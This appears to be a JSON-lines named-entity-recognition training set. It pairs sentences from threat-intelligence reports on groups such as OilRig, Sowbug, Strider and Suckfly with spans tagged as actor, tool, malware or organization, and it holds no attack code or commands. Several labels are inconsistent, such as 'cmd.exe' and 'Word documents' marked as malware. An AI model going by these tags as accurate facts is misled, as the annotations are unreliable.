{"text": "A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation .", "spans": {"THREAT_ACTOR: OilRig group": [[58, 70]], "TOOL: QUADAGENT samples": [[80, 97]], "TOOL: Invoke-Obfuscation": [[160, 178]]}, "info": {"id": "dnrti_train_001157", "source": "dnrti_train"}}
{"text": "All three waves involved a single spear phishing email that appeared to originate from a government agency based in the Middle East .", "spans": {"ORGANIZATION: government agency": [[89, 106]]}, "info": {"id": "dnrti_train_001158", "source": "dnrti_train"}}
{"text": "This latest attack consisted of three waves between May and June 2018 .", "spans": {}, "info": {"id": "dnrti_train_001159", "source": "dnrti_train"}}
{"text": "The OilRig group continues to be a persistent adversary group in the Middle East region .", "spans": {"THREAT_ACTOR: OilRig group": [[4, 16]], "THREAT_ACTOR: group": [[56, 61]]}, "info": {"id": "dnrti_train_001160", "source": "dnrti_train"}}
{"text": "APT34 are involved in long-term cyber espionage operations largely focused on the Middle East .", "spans": {"THREAT_ACTOR: APT34": [[0, 5]]}, "info": {"id": "dnrti_train_001161", "source": "dnrti_train"}}
{"text": "Recent investigations by FireEye 's Mandiant incident response consultants combined with FireEye iSIGHT Threat Intelligence analysis have given us a more complete picture of a suspected Iranian threat group , that we believe has been operating since at least 2014 .", "spans": {"ORGANIZATION: FireEye 's Mandiant": [[25, 44]], "ORGANIZATION: FireEye iSIGHT Threat Intelligence": [[89, 123]], "THREAT_ACTOR: threat group": [[194, 206]]}, "info": {"id": "dnrti_train_001163", "source": "dnrti_train"}}
{"text": "On January 8 , 2018 , Unit 42 observed the OilRig threat group carry out an attack on an insurance agency based in the Middle East .", "spans": {"ORGANIZATION: Unit 42": [[22, 29]], "THREAT_ACTOR: OilRig": [[43, 49]], "THREAT_ACTOR: threat group": [[50, 62]], "ORGANIZATION: insurance agency": [[89, 105]]}, "info": {"id": "dnrti_train_001165", "source": "dnrti_train"}}
{"text": "APT34 uses a mix of public and non-public tools , often conducting spear phishing operations using compromised accounts from trusted third parties , sometimes coupled with social engineering tactics .", "spans": {"THREAT_ACTOR: APT34": [[0, 5]], "TOOL: public and non-public tools": [[20, 47]], "TOOL: compromised accounts": [[99, 119]]}, "info": {"id": "dnrti_train_001166", "source": "dnrti_train"}}
{"text": "Just over a week later , on January 16 , 2018 , we observed an attack on a Middle Eastern financial institution .", "spans": {"ORGANIZATION: financial institution": [[90, 111]]}, "info": {"id": "dnrti_train_001167", "source": "dnrti_train"}}
{"text": "The January 8 attack used a variant of the ThreeDollars delivery document , which we identified as part of the OilRig toolset based on attacks that occurred in August 2017 .", "spans": {"MALWARE: ThreeDollars delivery document": [[43, 73]], "THREAT_ACTOR: OilRig": [[111, 117]]}, "info": {"id": "dnrti_train_001168", "source": "dnrti_train"}}
{"text": "However , the attack on January 16 did not involve ThreeDollars at all .", "spans": {"TOOL: ThreeDollars": [[51, 63]]}, "info": {"id": "dnrti_train_001169", "source": "dnrti_train"}}
{"text": "Interestingly , the targeted organization in the January 16 attack had already been targeted by the OilRig group a year ago on January 2017 .", "spans": {"THREAT_ACTOR: OilRig group": [[100, 112]]}, "info": {"id": "dnrti_train_001170", "source": "dnrti_train"}}
{"text": "Instead , OilRig 's attack involved delivering the OopsIE Trojan directly to the victim , most likely using a link in a spear phishing email .", "spans": {"THREAT_ACTOR: OilRig": [[10, 16]], "TOOL: OopsIE Trojan": [[51, 64]]}, "info": {"id": "dnrti_train_001171", "source": "dnrti_train"}}
{"text": "In the January 16 , 2018 attack , we observed OilRig attacking an organization it previously targeted in January 2017 .", "spans": {}, "info": {"id": "dnrti_train_001172", "source": "dnrti_train"}}
{"text": "On January 8 , 2018 , the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to an insurance agency in the Middle East .", "spans": {"THREAT_ACTOR: OilRig": [[26, 32]], "THREAT_ACTOR: threat group": [[33, 45]], "ORGANIZATION: insurance agency": [[119, 135]]}, "info": {"id": "dnrti_train_001173", "source": "dnrti_train"}}
{"text": "The email contained an attachment named Seminar-Invitation.doc , which is a malicious Microsoft Word document we track as ThreeDollars .", "spans": {"MALWARE: Seminar-Invitation.doc": [[40, 62]], "TOOL: Microsoft Word": [[86, 100]], "TOOL: ThreeDollars": [[122, 134]]}, "info": {"id": "dnrti_train_001174", "source": "dnrti_train"}}
{"text": "This suggests that due to the January 2017 attack , the targeted organization may have taken actions to counter known OilRig TTPs , in this case delivering malicious macro documents , causing the OilRig operators to adopt a different delivery tactic .", "spans": {"THREAT_ACTOR: OilRig": [[118, 124], [196, 202]], "THREAT_ACTOR: operators": [[203, 212]]}, "info": {"id": "dnrti_train_001175", "source": "dnrti_train"}}
{"text": "We also identified another sample of ThreeDollars , created on January 15 , 2017 with the file name strategy preparation.dot .", "spans": {"TOOL: ThreeDollars": [[37, 49]], "MALWARE: preparation.dot": [[109, 124]]}, "info": {"id": "dnrti_train_001176", "source": "dnrti_train"}}
{"text": "The samples of ThreeDollars we collected in these attacks are structurally very similar to the first sample we analyzed in October 2017 , down to the lure image used to trick the recipient into clicking the \" Enable Content \" button to execute the malicious macro .", "spans": {"TOOL: ThreeDollars": [[15, 27]]}, "info": {"id": "dnrti_train_001177", "source": "dnrti_train"}}
{"text": "Since May 2016 , we have continued to monitor and uncover various attacks and tools associated with the OilRig group .", "spans": {"THREAT_ACTOR: OilRig group": [[104, 116]]}, "info": {"id": "dnrti_train_001178", "source": "dnrti_train"}}
{"text": "] com , which we previously identified in October 2017 to be an OilRig C2 .", "spans": {"THREAT_ACTOR: OilRig": [[64, 70]]}, "info": {"id": "dnrti_train_001179", "source": "dnrti_train"}}
{"text": "Based on previously observed tactics , it is highly likely the OilRig group leveraged credential harvesting and compromised accounts to use the government agency as a launching platform for their true attacks .", "spans": {"THREAT_ACTOR: OilRig group": [[63, 75]], "TOOL: credential harvesting": [[86, 107]], "TOOL: compromised accounts": [[112, 132]], "ORGANIZATION: government agency": [[144, 161]]}, "info": {"id": "dnrti_train_001180", "source": "dnrti_train"}}
{"text": "Inspecting the class C network for 185.162.235.0/24 shows us that another IP on the same network resolves to an OilRig domain , msoffice-cdn.com which we identified in August 2017 .", "spans": {"THREAT_ACTOR: OilRig": [[112, 118]]}, "info": {"id": "dnrti_train_001181", "source": "dnrti_train"}}
{"text": "We had previously observed this author name in use once before , in the very first ThreeDollars document we collected that we had reported on in August 2017 .", "spans": {"MALWARE: ThreeDollars document": [[83, 104]]}, "info": {"id": "dnrti_train_001182", "source": "dnrti_train"}}
{"text": "The OilRig group continues to remain a highly active adversary in the Middle East region .", "spans": {"THREAT_ACTOR: OilRig group": [[4, 16]]}, "info": {"id": "dnrti_train_001183", "source": "dnrti_train"}}
{"text": "Organizations detected a compromise themselves in 62% of the cases that Mandiant worked in 2017 .", "spans": {"ORGANIZATION: Mandiant": [[72, 80]]}, "info": {"id": "dnrti_train_001184", "source": "dnrti_train"}}
{"text": "Repeated targeting of Middle Eastern financial , energy and government organizations leads FireEye to assess that those sectors are a primary concern of APT34 .", "spans": {"ORGANIZATION: financial": [[37, 46]], "ORGANIZATION: energy": [[49, 55]], "ORGANIZATION: government organizations": [[60, 84]], "ORGANIZATION: FireEye": [[91, 98]], "THREAT_ACTOR: APT34": [[153, 158]]}, "info": {"id": "dnrti_train_001186", "source": "dnrti_train"}}
{"text": "The use of infrastructure tied to Iranian operations , timing and alignment with the national interests of Iran also lead FireEye to assess that APT34 acts on behalf of the Iranian government .", "spans": {"ORGANIZATION: FireEye": [[122, 129]], "THREAT_ACTOR: APT34": [[145, 150]]}, "info": {"id": "dnrti_train_001187", "source": "dnrti_train"}}
{"text": "APT34 uses a mix of public and non-public tools ( Fig.2 ) and often uses compromised accounts to conduct spear-phishing operations .", "spans": {"THREAT_ACTOR: APT34": [[0, 5]], "TOOL: public and non-public tools": [[20, 47]], "TOOL: compromised accounts": [[73, 93]]}, "info": {"id": "dnrti_train_001188", "source": "dnrti_train"}}
{"text": "Unit 42 's ongoing research into the OilRig campaign shows that the threat actors involved in the original attack campaign continue to add new Trojans to their toolset and continue their persistent attacks in the Middle East .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "THREAT_ACTOR: threat actors": [[68, 81]]}, "info": {"id": "dnrti_train_001190", "source": "dnrti_train"}}
{"text": "When we first discovered the OilRig attack campaign in May 2016 , we believed at the time it was a unique attack campaign likely operated by a known , existing threat group .", "spans": {"THREAT_ACTOR: threat group": [[160, 172]]}, "info": {"id": "dnrti_train_001191", "source": "dnrti_train"}}
{"text": "The email address is associated with the Lebanese domain of a major global financial institution .", "spans": {"ORGANIZATION: financial institution": [[75, 96]]}, "info": {"id": "dnrti_train_001192", "source": "dnrti_train"}}
{"text": "In July 2017 , we observed the OilRig group using a tool they developed called ISMAgent in a new set of targeted attacks .", "spans": {"THREAT_ACTOR: OilRig group": [[31, 43]], "TOOL: ISMAgent": [[79, 87]]}, "info": {"id": "dnrti_train_001194", "source": "dnrti_train"}}
{"text": "In August 2017 , we found this threat group has developed yet another Trojan that they call ' Agent Injector ' with the specific purpose of installing the ISMAgent backdoor .", "spans": {"THREAT_ACTOR: threat group": [[31, 43]], "TOOL: ISMAgent backdoor": [[155, 172]]}, "info": {"id": "dnrti_train_001195", "source": "dnrti_train"}}
{"text": "On August 23 , 2017 , we observed OilRig targeting an organization within the United Arab Emirates government .", "spans": {"THREAT_ACTOR: OilRig": [[34, 40]]}, "info": {"id": "dnrti_train_001196", "source": "dnrti_train"}}
{"text": "Based on that research and this observation , we postulate that the OilRig group gathered credentials to a legitimate user 's OWA account and logged into the user 's account to send phishing attacks to other individuals within the same , targeted organization .", "spans": {"THREAT_ACTOR: OilRig group": [[68, 80]]}, "info": {"id": "dnrti_train_001197", "source": "dnrti_train"}}
{"text": "The OilRig group continues to target organizations in the Middle East , in this instance targeting the government of the United Arab Emirates .", "spans": {"THREAT_ACTOR: OilRig group": [[4, 16]]}, "info": {"id": "dnrti_train_001198", "source": "dnrti_train"}}
{"text": "The payload embedded within the ISMInjector sample delivered in this attack is a variant of the ISMAgent backdoor that we had discussed in detail in our blog discussing a targeted attack on a Saudi Arabian technology company .", "spans": {"TOOL: ISMInjector sample": [[32, 50]], "TOOL: ISMAgent backdoor": [[96, 113]], "ORGANIZATION: technology company": [[206, 224]]}, "info": {"id": "dnrti_train_001199", "source": "dnrti_train"}}
{"text": "Initial inspection of this attack suggested this was again the OilRig campaign using their existing toolset , but further examination revealed not only new variants of the delivery document we named Clayslide , but also a different payload embedded inside it .", "spans": {"TOOL: Clayslide": [[199, 208]]}, "info": {"id": "dnrti_train_001200", "source": "dnrti_train"}}
{"text": "In July 2017 , we observed an attack on a Middle Eastern technology organization that was also targeted by the OilRig campaign in August 2016 .", "spans": {"ORGANIZATION: technology organization": [[57, 80]]}, "info": {"id": "dnrti_train_001201", "source": "dnrti_train"}}
{"text": "This technique was observed in previous Clayslide documents to access the script variant of the Helminth Trojan in earlier OilRig attacks .", "spans": {"TOOL: Clayslide documents": [[40, 59]]}, "info": {"id": "dnrti_train_001202", "source": "dnrti_train"}}
{"text": "In the past , we had primarily associated the OilRig campaign with using the Clayslide documents to deliver as a payload a Trojan we named Helminth ; in this instance , the payload was instead a variant of the ISMDoor Trojan with significant modifications which we are now tracking as ISMAgent .", "spans": {"TOOL: Clayslide documents": [[77, 96]], "TOOL: Helminth": [[139, 147]], "TOOL: ISMDoor Trojan": [[210, 224]], "TOOL: ISMAgent": [[285, 293]]}, "info": {"id": "dnrti_train_001203", "source": "dnrti_train"}}
{"text": "The June 2017 sample of Clayslide contained the same OfficeServicesStatus.vbs file found in the ISMAgent Clayslide document , but instead of having the payload embedded in the macro as segregated base64 strings that would be concatenated , this variant obtained its payload from multiple cells within the \" Incompatible \" worksheet .", "spans": {"TOOL: Clayslide": [[24, 33]], "MALWARE: OfficeServicesStatus.vbs file": [[53, 82]], "TOOL: ISMAgent Clayslide document": [[96, 123]]}, "info": {"id": "dnrti_train_001204", "source": "dnrti_train"}}
{"text": "Clearly , OilRig incorporates a testing component within their development process , as we have previously observed OilRig performing testing activities on their delivery documents and their TwoFace webshells .", "spans": {"THREAT_ACTOR: OilRig": [[10, 16], [116, 122]], "TOOL: delivery documents": [[162, 180]], "TOOL: TwoFace webshells": [[191, 208]]}, "info": {"id": "dnrti_train_001205", "source": "dnrti_train"}}
{"text": "While continuing research on the August 2018 attacks on a Middle eastern government that delivered BONDUPDATER , Unit 42 researchers observed OilRig 's testing activities and with high confidence links this testing to the creation of the weaponized delivery document used in this attack .", "spans": {"TOOL: BONDUPDATER": [[99, 110]], "ORGANIZATION: Unit 42": [[113, 120]], "THREAT_ACTOR: OilRig": [[142, 148]]}, "info": {"id": "dnrti_train_001206", "source": "dnrti_train"}}
{"text": "While investigating recent attacks performed by the threat actor group OilRig using their new Bondupdater version , Unit 42 researchers searched for additional Microsoft Office documents used by OilRig hoping to locate additional malware being used in other attacks during the same time period .", "spans": {"THREAT_ACTOR: threat actor group OilRig": [[52, 77]], "TOOL: Bondupdater": [[94, 105]], "ORGANIZATION: Unit 42": [[116, 123]], "THREAT_ACTOR: OilRig": [[195, 201]]}, "info": {"id": "dnrti_train_001207", "source": "dnrti_train"}}
{"text": "The tester created the final test file less than 8 hours before the creation time of a delivery document , which was then delivered via a spear-phishing email 20 minutes later .", "spans": {}, "info": {"id": "dnrti_train_001208", "source": "dnrti_train"}}
{"text": "During this testing , we saw document filenames that contain the C2 we witnessed in the targeted attack above , specifically the filenames XLS-withyourface.xls and XLS-withyourface – test.xls .", "spans": {"MALWARE: XLS-withyourface.xls": [[139, 159]], "MALWARE: XLS-withyourface – test.xls": [[164, 191]]}, "info": {"id": "dnrti_train_001209", "source": "dnrti_train"}}
{"text": "These samples appeared to have been created by OilRig during their development and testing activities , all of which share many similarities with the delivery document used in the recent OilRig attack against a Middle Eastern government , N56.15.doc ( 7cbad6b3f505a199d6766a86b41ed23786bbb99dab9cae6c18936afdc2512f00 ) that we have also included in Table 1 .", "spans": {"THREAT_ACTOR: OilRig": [[47, 53]], "MALWARE: N56.15.doc": [[239, 249]]}, "info": {"id": "dnrti_train_001210", "source": "dnrti_train"}}
{"text": "However , they later continued by making modifications to the Excel document just prior to the attack on August 26th .", "spans": {}, "info": {"id": "dnrti_train_001211", "source": "dnrti_train"}}
{"text": "Additionally , HELIX KITTEN actors have shown an affinity for creating thoroughly researched and structured spear-phishing messages relevant to the interests of targeted personnel .", "spans": {"THREAT_ACTOR: HELIX KITTEN actors": [[15, 34]], "ORGANIZATION: personnel": [[170, 179]]}, "info": {"id": "dnrti_train_001213", "source": "dnrti_train"}}
{"text": "In addition to Helminth , the ISMDoor implant is likely used by the Iran-based adversary to attack targets particularly those in the Middle East region .", "spans": {"TOOL: Helminth": [[15, 23]], "TOOL: ISMDoor": [[30, 37]]}, "info": {"id": "dnrti_train_001214", "source": "dnrti_train"}}
{"text": "These incidents involved spear-phishing attacks , which characteristic of HELIX KITTEN , included emails containing malicious PowerShell in their macros that connects to known C2 infrastructure .", "spans": {"THREAT_ACTOR: HELIX KITTEN": [[74, 86]], "TOOL: PowerShell": [[126, 136]]}, "info": {"id": "dnrti_train_001215", "source": "dnrti_train"}}
{"text": "During the summer of 2018 , HELIX KITTEN actors were observed targeting entities in the Middle East — of note , targets appeared to be located in Bahrain and Kuwait .", "spans": {"THREAT_ACTOR: HELIX KITTEN actors": [[28, 47]]}, "info": {"id": "dnrti_train_001216", "source": "dnrti_train"}}
{"text": "ISMDoor is able to exfiltrate data , take screenshots , and execute arbitrary commands on the victim 's machine .", "spans": {"TOOL: ISMDoor": [[0, 7]]}, "info": {"id": "dnrti_train_001217", "source": "dnrti_train"}}
{"text": "In early November 2018 , CrowdStrike observed activity from the HELIX KITTEN adversary at a customer in the telecommunications vertical .", "spans": {"ORGANIZATION: CrowdStrike": [[25, 36]], "THREAT_ACTOR: HELIX KITTEN": [[64, 76]]}, "info": {"id": "dnrti_train_001218", "source": "dnrti_train"}}
{"text": "The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East .", "spans": {"THREAT_ACTOR: attackers": [[4, 13]], "MALWARE: XLS files": [[60, 69]], "ORGANIZATION: employees working in the banking sector": [[73, 112]]}, "info": {"id": "dnrti_train_001219", "source": "dnrti_train"}}
{"text": "In the first week of May 2016 , FireEye 's DTI identified a wave of emails containing malicious attachments being sent to multiple banks in the Middle East region .", "spans": {"ORGANIZATION: FireEye 's DTI": [[32, 46]], "MALWARE: malicious attachments": [[86, 107]]}, "info": {"id": "dnrti_train_001220", "source": "dnrti_train"}}
{"text": "Our data suggests that actors have deployed the RGDoor backdoor on webservers belonging to eight Middle Eastern government organizations , as well as one financial and one educational institution .", "spans": {"THREAT_ACTOR: actors": [[23, 29]], "TOOL: RGDoor backdoor": [[48, 63]], "ORGANIZATION: government organizations": [[112, 136]], "ORGANIZATION: financial": [[154, 163]], "ORGANIZATION: educational institution": [[172, 195]]}, "info": {"id": "dnrti_train_001221", "source": "dnrti_train"}}
{"text": "In August 2018 , Unit 42 observed OilRig targeting a government organization using spear-phishing emails to deliver an updated version of a Trojan known as BONDUPDATER .", "spans": {"ORGANIZATION: Unit 42": [[17, 24]], "THREAT_ACTOR: OilRig": [[34, 40]], "ORGANIZATION: government organization": [[53, 76]], "TOOL: BONDUPDATER": [[156, 167]]}, "info": {"id": "dnrti_train_001222", "source": "dnrti_train"}}
{"text": "The OilRig group has been active since at least mid-2016 , and continues their attack campaigns throughout the Middle East , targeting both governmental agencies and businesses on an almost routine basis .", "spans": {"THREAT_ACTOR: OilRig group": [[4, 16]], "ORGANIZATION: governmental agencies": [[140, 161]]}, "info": {"id": "dnrti_train_001223", "source": "dnrti_train"}}
{"text": "BONDUPDATER is a PowerShell-based Trojan first discovered by FireEye in mid-November 2017 , when OilRig targeted a different Middle Eastern governmental organization .", "spans": {"TOOL: BONDUPDATER": [[0, 11]], "TOOL: PowerShell-based Trojan": [[17, 40]], "ORGANIZATION: FireEye": [[61, 68]], "THREAT_ACTOR: OilRig": [[97, 103]], "ORGANIZATION: governmental organization": [[140, 165]]}, "info": {"id": "dnrti_train_001224", "source": "dnrti_train"}}
{"text": "During the past month , Unit 42 observed several attacks against a Middle Eastern government leveraging an updated version of the BONDUPDATER malware , which now includes the ability to use TXT records within its DNS tunneling protocol for its C2 communications .", "spans": {"ORGANIZATION: Unit 42": [[24, 31]], "TOOL: BONDUPDATER malware": [[130, 149]], "TOOL: DNS tunneling": [[213, 226]]}, "info": {"id": "dnrti_train_001225", "source": "dnrti_train"}}
{"text": "The email had no subject and what initially drew our attention to OilRig 's attack was the content of the spear phishing email .", "spans": {"THREAT_ACTOR: OilRig": [[66, 72]]}, "info": {"id": "dnrti_train_001226", "source": "dnrti_train"}}
{"text": "As expected , OilRig is continuing their onslaught of attacks well into 2018 with continued targeting in the Middle East .", "spans": {"THREAT_ACTOR: OilRig": [[14, 20]]}, "info": {"id": "dnrti_train_001227", "source": "dnrti_train"}}
{"text": "First identified in January 2015 , Orangeworm has also conducted targeted attacks against organizations in related industries as part of a larger supply-chain attack in order to reach their intended victims .", "spans": {}, "info": {"id": "dnrti_train_001228", "source": "dnrti_train"}}
{"text": "According to Symantec telemetry , almost 40 percent of Orangeworm 's confirmed victim organizations operate within the healthcare industry .", "spans": {"ORGANIZATION: Symantec": [[13, 21]]}, "info": {"id": "dnrti_train_001229", "source": "dnrti_train"}}
{"text": "Their next move was to list any remote shared drives and then attempt to access remote shares owned by the specific government office they were targeting , again attempting to extract all Word documents .", "spans": {"ORGANIZATION: government office": [[116, 133]], "MALWARE: Word documents": [[188, 202]]}, "info": {"id": "dnrti_train_001230", "source": "dnrti_train"}}
{"text": "Sowbug 's next move was to list any remote shared drives and then attempt to access remote shares owned by the specific government office they were targeting , again attempting to extract all Word documents .", "spans": {"THREAT_ACTOR: Sowbug": [[0, 6]], "ORGANIZATION: government office": [[120, 137]], "MALWARE: Word documents": [[192, 206]]}, "info": {"id": "dnrti_train_001231", "source": "dnrti_train"}}
{"text": "For example , in September 2016 , Sowbug infiltrated an organization in Asia , deploying the Felismus backdoor on one of its computers , Computer A , using the file name adobecms.exe in CSIDL_WINDOWS\\debug .", "spans": {"THREAT_ACTOR: Sowbug": [[34, 40]], "TOOL: Felismus backdoor": [[93, 110]], "MALWARE: adobecms.exe": [[170, 182]], "MALWARE: CSIDL_WINDOWS\\debug": [[186, 205]]}, "info": {"id": "dnrti_train_001232", "source": "dnrti_train"}}
{"text": "In this case , the attackers maintained a presence on the target 's network for nearly six months between September 2016 and March 2017 .", "spans": {}, "info": {"id": "dnrti_train_001233", "source": "dnrti_train"}}
{"text": "In other attacks , there was evidence that Felismus was installed using a tool known as Starloader ( detected by Symantec as Trojan.Starloader ) .", "spans": {"TOOL: Felismus": [[43, 51]], "TOOL: Starloader": [[88, 98]], "ORGANIZATION: Symantec": [[113, 121]], "TOOL: Trojan.Starloader": [[125, 142]]}, "info": {"id": "dnrti_train_001234", "source": "dnrti_train"}}
{"text": "Symantec has found evidence of Starloader files being named AdobeUpdate.exe , AcrobatUpdate.exe , and INTELUPDATE.EXE among others .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "MALWARE: Starloader files": [[31, 47]], "MALWARE: AdobeUpdate.exe": [[60, 75]], "MALWARE: AcrobatUpdate.exe": [[78, 95]], "MALWARE: INTELUPDATE.EXE": [[102, 117]]}, "info": {"id": "dnrti_train_001235", "source": "dnrti_train"}}
{"text": "Additionally , Starloader was also observed deploying additional tools used by the attackers , such as credential dumpers and keyloggers .", "spans": {"TOOL: Starloader": [[15, 25]], "TOOL: credential dumpers": [[103, 121]], "TOOL: keyloggers": [[126, 136]]}, "info": {"id": "dnrti_train_001236", "source": "dnrti_train"}}
{"text": "ASERT has learned of an APT campaign , possibly originating from DPRK , we are calling STOLEN PENCIL that is targeting academic institutions since at least May 2018 .", "spans": {"ORGANIZATION: ASERT": [[0, 5]], "ORGANIZATION: academic institutions": [[119, 140]]}, "info": {"id": "dnrti_train_001237", "source": "dnrti_train"}}
{"text": "Once gaining a foothold on a user 's system , the threat actors behind STOLEN PENCIL use Microsoft 's Remote Desktop Protocol ( RDP ) for remote point-and-click access .", "spans": {"ORGANIZATION: Microsoft": [[89, 98]], "TOOL: Remote Desktop Protocol": [[102, 125]], "TOOL: RDP": [[128, 131]]}, "info": {"id": "dnrti_train_001238", "source": "dnrti_train"}}
{"text": "The group uses an advanced piece of malware known as Remsec ( Backdoor.Remsec ) to conduct its attacks .", "spans": {"TOOL: Remsec": [[53, 59]], "TOOL: Backdoor.Remsec": [[62, 77]]}, "info": {"id": "dnrti_train_001239", "source": "dnrti_train"}}
{"text": "Strider has been active since at least October 2011 .", "spans": {"THREAT_ACTOR: Strider": [[0, 7]]}, "info": {"id": "dnrti_train_001240", "source": "dnrti_train"}}
{"text": "Lua modules is a technique that has previously been used by Flamer .", "spans": {"TOOL: Lua modules": [[0, 11]]}, "info": {"id": "dnrti_train_001241", "source": "dnrti_train"}}
{"text": "The Remsec malware used by Strider has a modular design .", "spans": {"TOOL: Remsec malware": [[4, 18]], "THREAT_ACTOR: Strider": [[27, 34]]}, "info": {"id": "dnrti_train_001242", "source": "dnrti_train"}}
{"text": "The group has maintained a low profile until now and its targets have been mainly organizations and individuals that would be of interest to a nation state 's intelligence services .", "spans": {}, "info": {"id": "dnrti_train_001243", "source": "dnrti_train"}}
{"text": "The group 's targets include a number of organizations and individuals located in Russia .", "spans": {}, "info": {"id": "dnrti_train_001244", "source": "dnrti_train"}}
{"text": "Remsec uses a Lua interpreter to run Lua modules which perform various functions .", "spans": {"TOOL: Remsec": [[0, 6]], "TOOL: Lua interpreter": [[14, 29]], "TOOL: Lua modules": [[37, 48]]}, "info": {"id": "dnrti_train_001245", "source": "dnrti_train"}}
{"text": "The attackers then began to perform reconnaissance activities on Computer A via cmd.exe , collecting system-related information , such as the OS version , hardware configuration , and network information .", "spans": {"MALWARE: cmd.exe": [[80, 87]]}, "info": {"id": "dnrti_train_001247", "source": "dnrti_train"}}
{"text": "the group 's targets include an organization in Sweden .", "spans": {}, "info": {"id": "dnrti_train_001248", "source": "dnrti_train"}}
{"text": "the group 's targets include an embassy in Belgium .", "spans": {"ORGANIZATION: embassy": [[32, 39]]}, "info": {"id": "dnrti_train_001249", "source": "dnrti_train"}}
{"text": "Symantec will continue to search for more Remsec modules and targets in order to build upon our understanding of Strider and better protect our customers .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "TOOL: Remsec modules": [[42, 56]], "THREAT_ACTOR: Strider": [[113, 120]]}, "info": {"id": "dnrti_train_001250", "source": "dnrti_train"}}
{"text": "Another such an exceptional espionage platform is \" ProjectSauron , also known as \" Strider \" .", "spans": {"TOOL: ProjectSauron": [[52, 65]], "THREAT_ACTOR: Strider": [[84, 91]]}, "info": {"id": "dnrti_train_001251", "source": "dnrti_train"}}
{"text": "In September 2015 , our anti-targeted attack technologies caught a previously unknown attack .", "spans": {}, "info": {"id": "dnrti_train_001252", "source": "dnrti_train"}}
{"text": "Forensic analysis indicates that the APT has been operational since at least June 2011 and was still active in 2016 .", "spans": {}, "info": {"id": "dnrti_train_001253", "source": "dnrti_train"}}
{"text": "After getting the IP , the ProjectSauron component tries to communicate with the remote server using its own ( ProjectSauron ) protocol as if it was yet another C&C server .", "spans": {"TOOL: ProjectSauron": [[27, 40], [111, 124]]}, "info": {"id": "dnrti_train_001254", "source": "dnrti_train"}}
{"text": "In a number of the cases we analyzed , ProjectSauron deployed malicious modules inside the custom network encryption 's software directory , disguised under similar filenames and accessing the data placed beside its own executable .", "spans": {"TOOL: ProjectSauron": [[39, 52]], "TOOL: malicious modules": [[62, 79]]}, "info": {"id": "dnrti_train_001255", "source": "dnrti_train"}}
{"text": "The threat actor behind ProjectSauron commands a top-of-the-top modular cyber-espionage platform in terms of technical sophistication , designed to enable long-term campaigns through stealthy survival mechanisms coupled with multiple exfiltration methods .", "spans": {"TOOL: ProjectSauron": [[24, 37]]}, "info": {"id": "dnrti_train_001256", "source": "dnrti_train"}}
{"text": "In September 2015 , Kaspersky Lab 's Anti-Targeted Attack Platform discovered anomalous network traffic in a government organization network .", "spans": {"ORGANIZATION: Kaspersky Lab": [[20, 33]], "MALWARE: anomalous network traffic": [[78, 103]], "ORGANIZATION: government organization": [[109, 132]]}, "info": {"id": "dnrti_train_001257", "source": "dnrti_train"}}
{"text": "Secondary ProjectSauron modules are designed to perform specific functions like stealing documents , recording keystrokes , and hijacking encryption keys from both infected computers and attached USB sticks .", "spans": {"TOOL: ProjectSauron modules": [[10, 31]]}, "info": {"id": "dnrti_train_001259", "source": "dnrti_train"}}
{"text": "activity originated from three separate IP addresses , all located in Chengdu , China .", "spans": {}, "info": {"id": "dnrti_train_001260", "source": "dnrti_train"}}
{"text": "stolen certificates being used maliciously occurred in early 2014 .", "spans": {}, "info": {"id": "dnrti_train_001262", "source": "dnrti_train"}}
{"text": "Specifically , Suckfly used a specially crafted web page to deliver an exploit for the Microsoft Windows OLE Remote Code Execution Vulnerability ( CVE-2014-6332 ) , which affects specific versions of Microsoft Windows .", "spans": {"VULNERABILITY: Microsoft Windows OLE Remote Code Execution Vulnerability": [[87, 144]], "VULNERABILITY: CVE-2014-6332": [[147, 160]]}, "info": {"id": "dnrti_train_001264", "source": "dnrti_train"}}
{"text": "The threat then executes \" svchost.exe \" .", "spans": {"TOOL: svchost.exe": [[27, 38]]}, "info": {"id": "dnrti_train_001265", "source": "dnrti_train"}}
{"text": "these attacks were part of a planned operation against specific targets in India .", "spans": {}, "info": {"id": "dnrti_train_001273", "source": "dnrti_train"}}
{"text": "While there have been several Suckfly campaigns that infected organizations with the group 's custom malware Backdoor.Nidiran , the Indian targets show a greater amount of post-infection activity than targets in other regions .", "spans": {"MALWARE: Backdoor.Nidiran": [[109, 125]]}, "info": {"id": "dnrti_train_001274", "source": "dnrti_train"}}
{"text": "In 2015 , Suckfly conducted a multistage attack .", "spans": {}, "info": {"id": "dnrti_train_001280", "source": "dnrti_train"}}
{"text": "Suckfly conducted a multistage attack between April 22 and May 4 .", "spans": {}, "info": {"id": "dnrti_train_001281", "source": "dnrti_train"}}
{"text": "Suckfly conducted a multistage attack against an e-commerce organization .", "spans": {"ORGANIZATION: e-commerce organization": [[49, 72]]}, "info": {"id": "dnrti_train_001283", "source": "dnrti_train"}}
{"text": "Suckfly conducted a multistage attack against an e-commerce organization based in India .", "spans": {"ORGANIZATION: e-commerce organization": [[49, 72]]}, "info": {"id": "dnrti_train_001284", "source": "dnrti_train"}}
{"text": "Using data collected from the Trend Micro™ Smart Protection Network , we are able to identify victims whose networks communicated with Taidoor C&C servers .", "spans": {"ORGANIZATION: Trend Micro™ Smart Protection Network": [[30, 67]], "TOOL: Taidoor C&C servers": [[135, 154]]}, "info": {"id": "dnrti_train_001299", "source": "dnrti_train"}}
{"text": "The Taidoor attackers have been actively engaging in targeted attacks since at least March 4 , 2009 .", "spans": {}, "info": {"id": "dnrti_train_001300", "source": "dnrti_train"}}
{"text": "Taidoor spoofed Taiwanese government email addresses to send out socially engineered emails in the Chinese language that typically leveraged Taiwan-themed issues .", "spans": {}, "info": {"id": "dnrti_train_001301", "source": "dnrti_train"}}
{"text": "Despite some exceptions , the Taidoor campaign often used Taiwanese IP addresses as C&C servers and email addresses to send out socially engineered emails with malware as attachments .", "spans": {"TOOL: IP": [[68, 70]]}, "info": {"id": "dnrti_train_001302", "source": "dnrti_train"}}
{"text": "One of the primary targets of the Taidoor campaign appeared to be the Taiwanese government .", "spans": {}, "info": {"id": "dnrti_train_001303", "source": "dnrti_train"}}
